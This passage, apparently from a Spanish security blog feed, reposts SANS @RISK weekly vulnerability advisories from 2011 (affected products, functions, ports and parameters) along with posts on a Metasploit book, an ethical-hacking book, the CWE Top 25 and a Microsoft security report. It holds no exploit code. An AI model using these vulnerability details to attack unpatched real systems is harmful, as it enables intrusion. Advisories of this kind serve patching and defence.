the "CASProcessor.exe" process through TCP port 20801. The issue
occurs in the "HandleMcpRequest()" function when parsing a specially
crafted packet with malformed BLOB encrypted data. Trend Micro Control
Manager 5.0 and 5.5 are vulnerable and other versions may also be
affected.
Ref: http://esupport.trendmicro.com/solution/en-us/1058292.aspx
______________________________________________________________________

11.29.10 CVE: Not Available
Platform: Linux
Title: Debian and Ubuntu foo2zjs Insecure Temporary File Creation
Vulnerability
Description: Foo2zjs is an open source printer driver for the ZjStream
protocol. Foo2zjs creates "/tmp/foo2zjs" in an insecure manner. An
attacker with local access could potentially exploit this issue to
perform symbolic-link attacks, overwriting arbitrary files in the
context of the affected application. Debian and Ubuntu are affected.
Ref: http://www.securityfocus.com/bid/48586/discuss
______________________________________________________________________

11.29.11 CVE: CVE-2011-2398
Platform: HP-UX
Title: HP-UX Dynamic Loader Unspecified Local Privilege Escalation
Description: HP-UX Dynamic Loader is a Unix-based operating system.
Dynamic Loader is exposed to an unspecified local privilege escalation
issue. HP-UX B.11.11, B.11.23, and B.11.31 are vulnerable and other
versions may also be affected.
Ref:
http://h20565.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02904002&ac.admitted=1310010561389.876444892.492883150
______________________________________________________________________

11.29.12 CVE: CVE-2011-2516
Platform: Cross Platform
Title: Apache XML Security for C++ Signature Key Parsing Denial of
Service
Description: Apache XML Security for C++ is a library that implements
the primary security standards for XML. The library is exposed to a
denial of service issue. Specifically, the issue is caused by a
buffer overflow condition when creating or verifying XML signatures
with RSA keys of sizes in the order of 8192 bits or more. Attackers
can exploit this issue through overly long keys and cause the
application to deny service. Apache XML Security for C++ versions
prior to 1.6.1 are affected.
Ref: http://santuario.apache.org/secadv/CVE-2011-2516.txt
_______________________________________________________ ________ _______

11.29.13 CVE: Not Available
Platform: Cross Platform
Title: libpng PNG File Denial of Service
Description: The "libpng" library is a PNG reference library. The
application is exposed to a remote denial of service issue because it
fails to properly handle a sCAL chunk. Specifically, the
issue occurs when processing specially crafted PNG files. libpng
versions 1.5.x before 1.5.4, 1.4.x before 1.4.8, 1.2.x before 1.2.45
and 1.0.x before 1.0.55 are affected.
Ref: http://www.kb.cert.org/vuls/id/819894
______________________________________________________________________

11.29.14 CVE: CVE-2011-2634
Platform: Cross Platform
Title: Opera Web Browser Multiple Security Weaknesses
Description: Opera is a Web browser application. The application is
exposed to multiple security weaknesses that may allow unspecified
third party applications to hijack searches and customizations. Opera
versions prior to 11.10 are vulnerable.
Ref: http://www.opera.com/docs/changelogs/windows/1110/
http://www.opera.com/docs/changelogs/unix/1110/
http://www.opera.com/docs/changelogs/mac/1110/
______________________________________________________________________

11.29.15 CVE: CVE-2011-1224
Platform: Cross Platform
Title: IBM WebSphere MQ CDP Extension Revoked SSL Certificate
Validation Security Bypass Vulnerability
Description: IBM WebSphere MQ is a commercially available messaging
engine for enterprises. The application is exposed to a security
bypass issue that occurs because it fails to use the CRL Distribution
Points certificate extension which results in improper
validation of revoked SSL certificates. Versions prior to WebSphere MQ
6.0.2.11 and 7.0.1.5 are vulnerable.
Ref: http://www-01.ibm.com/support/docview.wss?uid=swg27014224
http://www-01.ibm.com/support/docview.wss?uid=swg27007069
______________________________________________________________________

11.29.16 CVE: Not Available
Platform: Cross Platform
Title: libsndfile PAF File Integer Overflow
Description: The "libsndfile" library is used for reading and writing
audio files. The application is exposed to an integer overflow issue
because it fails to perform adequate boundary checks on user-supplied
data. Specifically, this issue occurs within the "paf24_init()"
function of the "src/paf.c" source file when parsing specially crafted
"PAF" (Paris Audio) files. libsndfile 1.0.24 is vulnerable and other
versions may also be affected.
Ref: http://www.securityfocus.com/bid/48644/discuss
______________________________________________________________________

11.29.17 CVE: CVE-2011-2198
Platform: Cross Platform
Title: libvte9 "vte_sequence_handler_multiple()" Function Remote
Denial of Service
Description: The VTE library provides a terminal emulator widget
(VteTerminal) for applications using the GTK+ toolkit. The library is
exposed to a remote denial of service issue. Specifically, the issue
occurs because the library fails to sanitize user-supplied input that
has been submitted to the "insert-blank-characters" capability
(defined in "caps.c"). The issue affects the
"vte_sequence_handler_multiple()" function of the "vteseq.c" source
file. libvte9 1:0.24.3-2 is vulnerable and other versions may also be
affected.
Ref: http://www.securityfocus.com/bid/48645/discuss
______________________________________________________________________

11.29.18 CVE: Not Available
Platform: Cross Platform
Title: SAP MaxDB NULL Pointer Dereference Denial of Service
Description: SAP MaxDB is a database application available for
multiple platforms. The application is exposed to a denial of service
issue. Specifically, the issue occurs due to a NULL pointer
dereference error in the "DBTech-MAXDB" service (kernel.exe) when
processing specially crafted login handshake packets. SAP MaxDB
7.8.01.18 is vulnerable; other versions may also be affected.
Ref: http://www.securityfocus.com/bid/48646/discuss
______________________________________________________________________

11.29.19 CVE: CVE-2011-2508,CVE-2011-2507,CVE-2011-2506,CVE-2011-2505
Platform: Web Application
Title: phpMyAdmin Multiple Remote Vulnerabilities
Description: phpMyAdmin is a PHP-based Web application. The
application is exposed to multiple issues. An arbitrary PHP
code execution issue occurs due to an error in the "Swekey_login()"
function of the "libraries/auth/swekey/swekey.auth.lib.php" script.
An arbitrary PHP code execution issue occurs because the application
fails to properly sanitize user-supplied input passed to the
"PMA_createTargetTables()" function of the
"libraries/server_synchronize.lib.php" script. A local file include issue occurs
because the application fails to properly sanitize user-supplied input
passed to the "PMA_displayTableBody()" function of the
"libraries/display_tbl.lib.php" script. A PHP code injection is
possible in the setup scripts if the session variables are
overwritten. phpMyAdmin versions prior to 3.3.10.2 and 3.4.3.1 are vulnerable.
Ref: http://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php
http://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php
http://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php
http://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php
______________________________________________________________________

11.29.20 CVE: Not Available
Platform: Web Application
Title: DotNetNuke Multiple Security Bypass Vulnerabilities
Description: DotNetNuke is an open source framework for creating and
deploying web sites. The application is exposed to multiple security
bypass issues. A security bypass issue occurs due to an error in the
"soft-delete" function. An attacker can exploit this issue to undelete
a user by re-registering with the same credentials. A security bypass
issue occurs due to an error when validating user permissions in certain
management functions. A security bypass issue occurs due to an error
when verifying uploaded files. A security bypass issue occurs due to an
error when granting edit permissions for a webpage or a module. Versions
prior to DotNetNuke 5.6.3 are vulnerable.
Ref: http://www.securityfocus.com/bid/48584/discuss
______________________________________________________________________

11.29.21 CVE: Not Available
Platform: Web Application
Title: Ferdows CMS Cross-Site Scripting and Multiple SQL Injection
Vulnerabilities
Description: Ferdows CMS is a web-based application implemented in
ASP.NET. Ferdows CMS is exposed to multiple issues. A
cross-site scripting issue affects the "dataid" parameter of the
"showdata.aspx" script. The application is also exposed to Multiple
SQL injection issues. Ferdows CMS
Pro 1.1.0 and Ferdows CMS 9.0.5 are affected.
Ref: http://www.securityfocus.com/bid/48640/discuss
______________________________________________________________________

11.29.22 CVE: CVE-2011-2064
Platform: Network Device
Title: Cisco Content Services Gateway Malformed ICMP Messages Denial
of Service
Description: Cisco Content Services Gateway is a device used to
monitor network use. Cisco Content Services Gateway is exposed to a
denial of service issue when handling specially crafted ICMP messages.
Second Generation of Content Services Gateway is affected.
Ref:
http://www.cisco.com/en/US/products/products_security_advisory09186a0080b86503.shtml
______________________________________________________________________

11.29.23 CVE: Not Available
Platform: Network Device
Title: D-Link DSL-2650U Remote Denial of Service
Description: The D-Link DSL-2650U is an ADSL router with an 802.11g
wireless access point. The Web server running on the device is exposed
to a remote denial of service issue. The issue occurs due to the
improper handling of an overly large string provided to the "diagPrev"
parameter of the "diagpppoe.cgi" script. D-Link DSL-2650U 1.20 is
affected; other versions may also be vulnerable.
Ref: http://www.securityfocus.com/bid/48612/discuss
______________________________________________________________________

11.29.24 CVE: Not Available
Platform: Network Device
Title: Aruba Networks ArubaOS HTTP Response Splitting and HTML
Injection Vulnerabilities
Description: Aruba OS is an operating system used by various Aruba
Networks network devices, including the Aruba Mobility Controller.
Aruba Networks ArubaOS is exposed to multiple input validation issues.
An HTML injection issue affects the reporting feature of ArubaOS
and AirWave Administration WebUIs. An HTTP response splitting issue
affects the Captive Portal Web Interface. ArubaOS 3.3.X, 3.4.X, 5.0.X,
6.0.X, 2.4.X-FIPS, 3.3.X-FIPS, 3.4.X-FIPS and AirWave 7.2.X are
affected.
Ref: http://www.securityfocus.com/archive/1/518751
______________________________________________________________________

11.29.25 CVE: Not Available
Platform: Network Device
Title: Ingate Firewall and SIParator SIP Module Remote Denial of
Service
Description: Ingate Firewalls are hardware firewall devices that
support Session Initiation Protocol (SIP) via SIParator SIP-based
communication devices. Ingate Firewall and SIParator are exposed to a
denial of service issue. The issue occurs when processing SIP requests
that contain multiple Transport Layer Security destinations.
Ingate SIParator 4.9.1 and prior are affected.
Ref: http://www.ingate.com/Relnote.php?ver=492
______________________________________________________________________

11.29.26 CVE: CVE-2011-0549
Platform: Network Device
Title: Symantec Web Gateway Management GUI SQL Injection Vulnerability
Description: Symantec Web Gateway is a web security gateway appliance.
The device is exposed to an SQL injection issue because it fails to
sufficiently sanitize user-supplied data passed to the management GUI.
Versions prior to Symantec Web Gateway 5.0.1 are vulnerable.
Ref:
http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110707_00
______________________________________________________________________

"EL LIBRO" de MetaSploit Framework

noreply@blogger.com (Pablo Ramirez Hoffmann) — Wed, 13 Jul 2011 01:26:00 +0000

Esto es para que disfruten los pentester y los nuevos ethicals que quieran comenzar a utilizar este “Increíble” framework de trabajo… bueno les dejo la noticia recién salida del horno…

Offensive Security is happy to announce the availability of Metasploit, The Penetration Tester’s Guide – A new book by by Dave Kennedy (ReL1K), Devon Kearns (dookie), Jim O’Gorman (_Elwood_), and Mati Aharoni (muts). The book is released through No Starch Press and will begin appearing on store shelves July 19.

The goals of the book are to provide a single point of reference for the Metasploit Framework which doesn’t quickly become outdated and to provide an in depth resource for penetration testers who wish to understand the Framework inside out. The book covers everything from Metasploit basics to fuzzing, exploit development, custom module creation, writing post exploitation modules and meterpreter kung-fu.

Learn how to:

· Find and exploit unmaintained, misconfigured, and unpatched systems

· Perform reconnaissance and find valuable information about your target

· Bypass anti-virus technologies and circumvent security controls

· Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery

· Use the Meterpreter shell to launch further attacks from inside the network

· Harness standalone Metasploit utilities, third-party tools, and plug-ins

· Learn how to write your own Meterpreter post exploitation modules and scripts

Table of Contents

Chapter 1: The Absolute Basics of Penetration Testing
Chapter 2: Metasploit Basics
Chapter 3: Intelligence Gathering
Chapter 4: Vulnerability Scanning
Chapter 5: The Joy of Exploitation
Chapter 6: Meterpreter
Chapter 7: Avoiding Detection
Chapter 8: Exploitation Using Client-side Attacks
Chapter 9: Metasploit Auxiliary Modules
Chapter 10: The Social-Engineer Toolkit
Chapter 11: Fast-Track
Chapter 13: Building Your Own Module
Chapter 14: Creating Your Own Exploits
Chapter 15: Porting Exploits to the Metasploit Framework
Chapter 16: Meterpreter Scripting
Chapter 17: Simulated Penetration Test
Appendix A: Configuring Your Target Machines
Appendix B: Cheat Sheet

Download:

http://www.4shared.com/document/O64z3vVt/Metasploit_1_.html

Libro Hacking Ético Gratis

noreply@blogger.com (Pablo Ramirez Hoffmann) — Tue, 12 Jul 2011 18:52:00 +0000

Siempre es agradable difundir buen material, y aparte de forma gratuita, y hoy desde DragonJAR nos hacen llegar este material realmente interesante para consultores de seguridad TI.

Hace 3 años Carlos Tori, reconocido profesional Argentino de la seguridad informática, presentó en sociedad su libro “Hacking Ético”, basado en su experiencia y conocimiento del tema, el libro ayuda a sus lectores a ingresar en el mundo del Hacking Ético presentando en los conceptos básicos más importantes, de una forma práctica y eficiente, sin olvidar presentar la profundidad en cada tema.

Carlos Tori, anuncia que por diferentes motivos ha decidido publicar gratuitamente su obra.

Puedes descargarlo en tu equipo desde el mirror:

Descargar Libro Hacking Ético de Carlos Tori Gratis

Los 25 errores más peligrosos en Desarrollo 2011

noreply@blogger.com (Pablo Ramirez Hoffmann) — Mon, 11 Jul 2011 14:53:00 +0000

Como el título indica, esta es la lista que este año han creado CWE/SANS sobre los errores más peligrosos que cometemos los programadores en este año 2011.

Pos	Punt	ID	Descripción
[1]	93.8	CWE-89	No filtrar propiamente las sentencias SQL (Inyección SQL)
[2]	83.3	CWE-78	No filtrar las llamadas al sistema de forma adecuada (Inyección en comandos del SO)
[3]	79.0	CWE-120	No chequear el tamaño de la memoria reservada a la hora de copiar datos (desbordamiento de memoria)
[4]	77.7	CWE-79	No detectar la inyección de scripting (XSS)
[5]	76.9	CWE-306	No autentificar en llamada a funciones críticas
[6]	76.8	CWE-862	No autorización
[7]	75.0	CWE-798	Usar credenciales estáticos en el código
[8]	75.0	CWE-311	No cifrado de datos sensibles
[9]	74.0	CWE-434	No restringir la subida de ficheros a ciertos formatos
[10]	73.8	CWE-807	Confiar en una fuente de datos no confiable a la hora de tomar una decisión de seguridad
[11]	73.1	CWE-250	Ejecución con privilegios innecesarios
[12]	70.1	CWE-352	Cross-Site Request Forgery (CSRF)
[13]	69.3	CWE-22	No limitar el acceso al sistema de ficheros a directorios restringidos
[14]	68.5	CWE-494	Descarga de código sin chequear la integridad del mismo
[15]	67.8	CWE-863	Autorización incorrecta
[16]	66.0	CWE-829	Permitir la integración de funcionalidades de fuentes no confiables
[17]	65.5	CWE-732	Asignación de permisos incorrecta a recursos críticos
[18]	64.6	CWE-676	Uso de funciones potencialmente peligrosas
[19]	64.1	CWE-327	User un algoritmo de cifrado que ha sido comprometido o roto
[20]	62.4	CWE-131	Cálculo incorrecto del tamaño de memoria
[21]	61.5	CWE-307	No restricción a un número de intentos fallidos de acceso
[22]	61.1	CWE-601	Redirección URL a sitios no confiables (‘Open Redirect’)
[23]	61.0	CWE-134	Formato de cadena no controlado
[24]	60.3	CWE-190	Desbordamiento de enteros
[25]	59.9	CWE-759	Aplicar una función hash sin usar la sal

Aquí tienes toda la información en PDF

Microsoft Security Intelligence Report 10

noreply@blogger.com (Pablo Ramirez Hoffmann) — Mon, 11 Jul 2011 14:34:00 +0000

Después de analizar 600 millones de computadoras en todo el mundo, Microsoft publicó el volumen 10 de su Informe de Inteligencia de Seguridad (SIR), el cual puede ser descargado desde aquí http://download.microsoft.com/download/8/E/0/8E0A1D5A-7DF6-4A4F-AB97-7E12043E7368/Microsoft_Security_Intelligence_Report_volume_10_July-Dec2010_Spanish.pdf

Se centra en el malware, vulnerabilidades de software revelaciones de explotación de vulnerabilidades, y tendencias relacionadas. La mayoría de las vulnerabilidades en el 2010 fueron encontradas en las aplicaciones.

Java encabezó la lista de categorías con la cantidad de scripts dañinos creados, Adobe Acrobat Reader tuvo el mayor número de vulnerabilidades y Windows 7 y Windows Server 2008 R2 tuvieron la menor tasa de infección de sistema operativo.

Dentro de este panorama se encuentran dos tipos de conducta criminal, por un lado está un pequeño número de criminales sofisticados cuyos motivos varían desde los ataques generales hasta los específicos. Este tipo de agresores suelen tener una inteligencia especial sobre el entorno de su objetivo, hacen uso personalizado de ingeniería social para engañar a las víctimas o explotan las vulnerabilidades descubiertas más recientes en el software para comprometer las redes y los sistemas.

Por otro lado, están aquellos que aprovechan métodos de ataque más accesible, en algunos casos originalmente creado por los delincuentes más expertos, junto con la ingeniería social para tomar una pequeña cantidad de dinero de un gran número de personas. Las tácticas de ingeniería social implican engañar a las personas con un software de seguridad falso “Rogue Security Software” el cual se presenta como un producto para la protección legítima, se hacen pasar por amigos para robar contraseñas de cuentas de juegos en línea, realizan phishing a través de redes sociales y engañan a los usuarios para descargar el adware.

Software de Seguridad Falso (Rogue Security Software): fue detectado y bloqueado a casi 19 millones de sistemas en 2010, y las primeras cinco familias fueron responsables de aproximadamente 13 millones de estas detecciones.

Phishing: utilizando redes sociales como señuelo aumentó 1.200 % (de un mínimo de 8,3% de todos los "phishing" en enero y una máxima de 84,5 por ciento en diciembre de 2010). Phishing dirigido a sitios de juegos en línea alcanzó un máximo del 16,7 por ciento de todos los "phishing" en junio.

Adware: La detección mundial de navegación en la web aumentó en un 70%, desde el segundo trimestre al cuarto trimestre de 2010. Este aumento se debió casi por completo por la detección de un par de nuevas familias de adware, JS / Pornpop y Win32/ClickPotato, que son los dos programas maliciosos más comunes en muchos países.

A continuación les dejo alguno de los números expuestos en el informe.

Tendencias de vulnerabilidades según plataformas

Divulgaciones de vulnerabilidad en toda la industria por gravedad, 2006–2010

Divulgaciones de vulnerabilidad en toda la industria en 2010, por gravedad

Vulnerabilidades de seguridad detectadas por los productos antimalware de escritorio de Microsoft en 2010, agrupadas por plataforma o tecnología objetivo

Fuga de Información - Tarea de todos

noreply@blogger.com (Pablo Ramirez Hoffmann) — Fri, 08 Jul 2011 19:19:00 +0000

Comentarios: pramirezh[at]gmail_dot_com

Desde Wikileaks, a finales del 2010, la seguridad de la información es un tema que ha “vuelto” a estar en boca de todos. Pero Wikileaks es solo la punta del iceberg. Desde ese entonces hasta el día de hoy hemos sido testigos de distintos casos de fuga de información, FMI, Apple, CitiGroup, RSA, etc, en donde a través de un ataque informático, infección de un código malicioso u otras tantas causas, datos importantes de compañías fueron publicados en la web.

Ser víctimas de la fuga de información, es un tema que preocupa tanto a los usuarios como a las empresas y es debido a ello que suelen tomar recaudas para proteger su información. Para los usuarios la fuga de información es un tema muy importante, y el 67,7% de los usuarios está preocupado acerca de la posibilidad de que sus datos sean expuestos sin su consentimiento, según una encuestas de ESET.

Los usuarios tratan de proteger su información de la mejor manera posible a través del uso de soluciones antivirus, con firewalls y contraseñas fuertes, pero, ¿qué pasa cuando su información es protegida por alguien más? Cuando la información del usuario es relegada a un empresa que ofrece un servicio, son ellos quienes se comprometen a proteger sus datos, pero si la seguridad de la empresa se ve vulnerada, ¿qué hace el usuario?

Cuando una empresa que ofrece un servicio y se ve afectada por el robo de información, esto impacta de manera directa en la confianza de sus clientes. Según los resultados de la encuesta, ante un caso de robo de información, el 62,9% de los usuarios dejaría de utilizar el servicio, es decir que la empresa perdería a 6 de cada 10 clientes por no proteger bien su información.

Además de la cancelación del servicio el usuario se ve involucrado en otras tareas, como la cancelación de su tarjeta de crédito y el cambio de contraseña, esta secuencia de acciones deben ser tenidas en cuenta para evitar pérdidas monetarias o el robo de identidad.

Una vez que la información es robada, suele ser comercializada por los atacantes a través de portales en donde los datos de los usuarios tienen un precio. Uno de los problemas del robo de información acarrea es la suplantación de identidad. Por ejemplo, en lo referido esta temática, las estadísticas indican que 4 de cada 10 personas tardan alrededor de tres meses hasta notar el incidente, e incluso el 18% tarda más de 4 años en hacerlo.

Durante todo el tiempo que transcurre hasta que una víctima se da cuenta de que su información ha sido robada se encuentra expuesta a que un atacante realice acciones malintencionadas en nombre de él.

No existe un patrón que diga quién es más vulnerable a ser víctima del robo de información, pero los usuarios opinan que los quienes más expuestos están son las grandes empresas y las entidades bancarias. Esto está relacionado por la importancia de la información que gestionan.

El robo de información es una cuestión que involucra tanto a usuarios como a empresas y es en conjunto que a través del uso de herramientas tecnológicas, una correcta gestión y la educación se pueden minimizar estos sucesos y así evitar que información confidencial sea expuesta.

Hace unos días atrás conversaba con el representante de Latinoamérica de una importante fábrica de DLP (Líder en Gartner), y me comentaba que su solución cuando se implementaba en una pequeña parte de la organización, después TODOS quería la herramienta, esto habla que como consultores no estamos haciendo bien nuestro trabajo, y solo andamos mostrando herramientas, pero no realizamos estudios del real impacto que puede tener para una organización financiera, estatal o de cualquier índole, la fuga de información, para luego apoyarnos en las tecnologías disponible.

Resumen de Vulnerabilidades - Semana 28

noreply@blogger.com (Pablo Ramirez Hoffmann) — Fri, 08 Jul 2011 17:46:00 +0000

Comentarios: pramirezh[at]gmail_dot_com
______________________________________________________________________

@RISK: The Consensus Security Vulnerability Alert

Week 28 2011
______________________________________________________________________

Summary of Updates and Vulnerabilities in this Consensus

Platform Number of Updates and Vulnerabilities

- ------------------------ -------------------------------------

Third Party Windows Apps 5 (#1)

BSD 2

Cross Platform 12

Web Application - Cross Site Scripting 1

Web Application - SQL Injection 1

Web Application 3

Hardware 2

****************************************************************************

Part I -- Critical Vulnerabilities from TippingPoint (www.tippingpoint.com) Widely Deployed Software
(1) MEDIUM: HP iNode Management Center Stack Buffer Overflow

*************************************************************************

Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys
(www.qualys.com)

-- Third Party Windows Apps
11.28.1 - Winamp Essentials FLV File Heap-Based Buffer Overflow Vulnerability
11.28.2 - ESTsoft ALZip MIM File Processing Buffer Overflow
11.28.3 - HP Intelligent Management Centre Products Remote Code Execution
11.28.4 - IMesh "IMWebControl.dll" ActiveX Control Buffer Overflow
11.28.5 - XnView DLL Loading Arbitrary Code Execution Vulnerability

-- BSD
11.28.6 - OpenSSH "pam_thread()" Remote Buffer Overflow Vulnerability
11.28.7 - NetBSD M ultiple 'libc/net' Functions Stack Buffer Overflow Vulnerability

-- Cross Platform
11.28.8 - Asterisk SIP Authentication Request User Enumeration Weakness
11.28.9 - Sybase Advantage Server "ADS" Process Memory Corruption Vulnerability 11.28.10 - Zope Unspecified Security Bypass Vulnerability
11.28.11 - Ingate Firewall and SIParator SIP Module Remote Denial of Service Vulnerability
11.28.12 - Wireshark Lucent/Ascend File Parser Denial of Service
11.28.13 - SAP Netweaver Insecure SAPTerm User Account Creation Security Bypass Vulnerability
11.28.14 - IBM DB2 "DT_RPATH" Insecure Library Loading Arbitrary Code Execution Vulnerability
11.28.15 - Multiple Virtualization Applications Intel VT-d chipsets Local Privilege Escalation Vulnerability
11.28.16 - IBM InfoSphere Information Server Multiple Local Privilege Escalation Vulnerabilities
11.28.17 - IBM Tivoli Storage Manager Client Multiple Buffer Overflow
11.28.18 - Vsftpd Compromised Source Packages Backdoor Vulnerability
11.28.19 - ISC BIND 9 RPZ Configurations Remote Denial of Service 11.28.20 - Opera Web Browser Multiple Remote Denial of Service Vulnerabilities

-- Web Application - Cross Site Scripting
11.28.21 - WebCalendar Multiple Cross-Site Scripting Vulnerabilities

-- Web Application - SQL Injection
11.28.22 - PhpFood "restaurant.php" SQL Injection Vulnerability

-- Web Application
11.28.23 - AeroMail Multiple Vulnerabilities
11.28.24 - IBM Rational DOORS Multiple Unspecified Vulnerabilities
11.28.25 - WeBid Local File Include and SQL Injection Vulnerabilities
-- Hardware
11.28.26 - Portech MV-372 VoIP Gateway Multiple Security Vulnerabilities

______________________________________________________________________

PART I Critical Vulnerabilities
Part I for this issue has been compiled by Josh Bronson at TippingPoint, a division of HP, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/risk/#process

*************************************************************

(1) MEDIUM: HP iNode Management Center Stack Buffer Overflow
Affected:
HP Intelligent Management Center User Access Manager (UAM) prior to IMC_UAM_5.0_SP1_E0101P03 HP Intelligent Management Center Endpoint Admission Defense (EAD) prior to IMC_EAD_5.0_SP1_E0101P03

Description: HP has released patches for its Intelligent Management Center network management software. A component of the software, iNOdeMngChecker.exe, listens by default on port 9090 and copies attacker-provided data onto a fixed-length buffer on the stack. By sending a malicious request, an attacker can exploit this vulnerability in order to execute arbitrary code on the target's machine with SYSTEM-level privileges.

Status: vendor confirmed, updates available

References:
Vendor Site
http://www.hp.com
HP Security Bulletin
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02901775
Zero Day Initiative Advisory
http://www.zerodayinitiative.com/advisories/ZDI-11-232/
SecurityFocus BugTraq IDs
http://www.securityfocus.com/bid/48527

*************************************************************

Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys
(www.qualys.com)

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 11590 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.
______________________________________________________________________

11.28.1 CVE: Not Available
Platform: Third Party Windows Apps
Title: Winamp Essentials FLV File Heap-Base d Buffer Overflow Vulnerability
Description: Winamp Essentials contains plugins for the Winamp media player. The application is exposed to a heap-based buffer overflow issue because it fails to perform adequate boundary checks on user-supplied input. This issue affects the "f263.w5s" file when parsing "CustomWidth" and "CustomHeight" fields. Winamp Essentials 5.6 is vulnerable and other versions may also be affected.
Ref: http://www.securityfocus.com/bid/48494/info
______________________________________________________________________

11.28.2 CVE: CVE-2011-1336
Platform: Third Party Windows Apps
Title: ESTsoft ALZip MIM File Processing Buffer Overflow
Description: ESTsoft ALZip is a file compression application. The application is exposed to a buffer overflow issue because it fails to perform adequate boundary checks on user-supplied input. Specifically, this issue occurs when handling specially crafted "MIM" files. ESTsoft ALZip versions 8.21 and prior are affected.
Ref: http://jvn.jp/en/jp/JVN01547302/index.html
______________________________________________________________________

11.28.3 CVE: CVE-2011-1867
Platform: Third Party Windows Apps
Title: HP Intelligent Management Centre Products Remote Code Execution
Description: HP Intelligent Management Center (formerly 3com
IMC) is a network management application. HP Intelligent Management Center User Access Manager and Endpoint Admission Defense are exposed to a remote code execution issue because of a stack-based buffer overflow issue. Specifically, the issue effects the "iNOdeMngChecker.exe" component when handling a packet of type "0x0A0BF007". HP Intelligent Management Center User Access Manager
(UAM) v5.0 (E0101) and prior, HP Intelligent Management Center Endpoint Admission Defense (EAD) v5.0 (E0101) and prior are affected.
Ref:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02901775
______________________________________________________________________

11.28.4 CVE: Not Available
Platform: Third Party Windows Apps
Title: IMesh "IMWebControl.dll" ActiveX Control Buffer Overflow
Description: IMesh is a P2P client for the Microsoft Windows operating platform. The application is exposed to a buffer overflow issue because the application fails to perform adequate boundary checks on user supplied data. This issue affects the "ProcessRequestEx()" method of the "IMWebControl.dll" ActiveX control. This control is identified by CLSID: 7C3B01BC-53A5-48A0-A43B-0C67731134B97. iMesh version 10.0 and the prior are affected.
Ref: http://packetstormsecurity.org/files/view/102729/imesh-overflow.txt
______________________________________________________________________

11.28.5 CVE: CVE-2011-1338
Platform: Third Party Windows Apps
Title: XnView DLL Loading A rbitrary Code Execution Vulnerability
Description: XnView is an application for managing image files. The application is exposed to an issue that lets attackers execute arbitrary code. The issue arises because the application searches for Dynamic Link Library files in the current working directory. The issue can be exploited by placing both a specially crafted library file and a file that is associated with the vulnerable application in an attacker controlled location. Using the application to open the associated file will cause the malicious library file to be executed.
XnView versions prior to 1.98.1 are affected.
Ref: http://www.securityfocus.com/bid/48562/discuss
______________________________________________________________________

11.28.6 CVE: Not Available
Platform: BSD
Title: OpenSSH "pam_thread()" Remote Buffer Overflow Vulnerability
Description: OpenSSH (OpenBSD Secure Shell) is software that provides encrypted communications through the SSH protocol. OpenSSH is exposed to a buffer overflow issue because the library fails to properly perform bounds checks on user supplied input before copying it to an insufficiently sized memory buffer. This issue affects the "pam_thread()" function of the "auth2-pam-freebsd.c" source file.
OpenSSH 3.5p1 running on FreeBSD 4.9 and 4.11 vulnerable, other versions and platforms may also be affected.
Ref: http://www.securityfocus.com/bid/48507/info
______________________________________________________________________

11.28.7 CVE: CVE-2011-1656
Platform: BSD
Title: NetBSD Multiple "libc/net" Functions Stack Buffer Overflow Vulnerability
Description: NetBSD is exposed to a stack-based buffer overflow issue because it fails to properly bounds check user-supplied input.
Specifically, this issue affects the following functions in the "libc/net" library: "getservbyname()", "getservbyname_r()", "getservbyport()", "getservbyport_r()", "getaddrinfo()" and "getnameinfo()". NetBSD 5.1 is affected.
Ref: http://www.securityfocus.com/bid/48528/info
______________________________________________________________________

11.28.8 CVE: CVE-2011-2536
Platform: Cross Platform
Title: Asterisk SIP Authentication Request User Enumeration Weakness
Description: Asterisk is a private branch exchange application available for Linux, BSD and Mac OS X platforms. Asterisk is exposed to a user enumeration weakness. This issue occurs because the application responds differently when enumerating valid and invalid SIP usernames using the SIP authentication requests. Asterisk 1.4.41.2, 1.6.2.18.2, and 1.8.4.4 , Asterisk Business Edition C.3.7.3 are affected.
Ref: http://downloads.asterisk.org/pub/security/AST-2011-011.html
______________________________________________________________________

11.28.9 CVE: Not Available
Platform: Cross Platform
Title: Sybase Advantage Server "ADS" Process Memory Corruption Vulnerability
Description: Sybase Advantage Server is a relational database management application. The application is exposed to a memory corruption issue.
This issue affects the "ads.exe" service when handling a malformed packet sent to TCP or UDP port 6262. Sybase Advantage Server 10.0.0.3 is vulnerable and other versions may also be affected.
Ref: http://aluigi.altervista.org/adv/sybase_4-adv.txt
______________________________________________________________________

11.28.10 CVE: Not Available
Platform: Cross Platform
Title: Zope Unspecified Security Bypass Vulnerability
Description: Zope is a web application server. The application is exposed to an unspecified security bypass issue. Very few technical details are currently available. All versions of Zope and Plone are affected.
Ref: https://mail.zope.org/pipermail/zope-announce/2011-June/002260.html
______________________________________________________________________

11.28.11 CVE: Not Available
Platform: Hardware
Title: Ingate Firewall and SIParator SIP Module Remote Denial of Service Vulnerability
Description: Ingate Firewalls are hardware firewall devices that support Session Initiation Protocol (SIP) via SIParator SIP-based communication devices. Ingate Firewall and SIParator are exposed to a denial of service issue. The issue occurs when processing SIP requests that contain multiple Transport Layer Security destinations.
Ingate SIParator 4.9.1 and prior are affected
Ref: http://www.ingate.com/Relnote.php?ver=492
______________________________________________________________________

11.28.12 CVE: CVE-2011-2597
Platform: Cross Platform
Title: Wireshark Lucent/Ascend File Parser Denial of Service
